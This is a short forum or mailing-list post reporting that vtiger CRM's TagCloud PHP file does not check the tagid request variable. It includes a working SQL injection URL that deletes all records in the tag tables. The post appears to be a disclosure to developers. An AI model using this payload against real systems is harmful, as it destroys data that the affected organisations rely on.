SQL injection attack on tag cloud feature

classic Classic list List threaded Threaded
1 message Options
Reply | Threaded
Open this post in threaded view
|

SQL injection attack on tag cloud feature

Tim Smith-10
I noticed that the TagCloud php file did no checking on the tagid request variable.

You can delete all records in the tag tables by using this URL:
vtigercrm/index.php?file=TagCloud&module=Leads&action=LeadsAjax&ajxaction=DELETETAG&tagid=0%20or%20(1=1);

Tim
onwealdtim

_______________________________________________
Get started with creating presentations online - http://zohoshow.com?vt